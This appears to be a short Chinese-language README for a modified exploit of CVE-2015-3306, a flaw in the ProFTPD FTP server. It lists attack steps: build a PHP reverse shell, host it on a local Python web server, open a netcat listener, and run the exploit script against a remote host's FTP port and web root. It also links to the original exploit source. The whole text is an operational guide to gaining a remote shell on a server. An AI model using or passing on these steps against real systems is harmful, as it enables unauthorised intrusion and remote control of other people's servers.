Modified-CVE-2015-3306-Exploit
如何使用
- 创建一个 PHP 反向 shell
- 启动服务器以在同一目录中托管 shell (python3 -m http.server)
- 启动 netcat 监听器在本地选择的端口,例如:(nc -nlvp [port of choice])
- 运行以下提供的漏洞利用示例 (python3 modified_CVE_2015_3306.py --host [remote host] --port [most likely port 21] --path [/var/www or /var/www/html] --shell [name of php shell] --lhost [port of netcat listener] --server_port [port of server hosting shell]

原始漏洞利用源代码:https://github.com/t0kx/exploit-CVE-2015-3306/blob/master/exploit.py